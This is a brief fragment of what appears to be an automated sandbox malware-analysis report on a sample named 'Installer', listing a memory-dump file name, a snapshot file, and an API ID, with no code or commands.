• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: MetricsSystem
• String ID: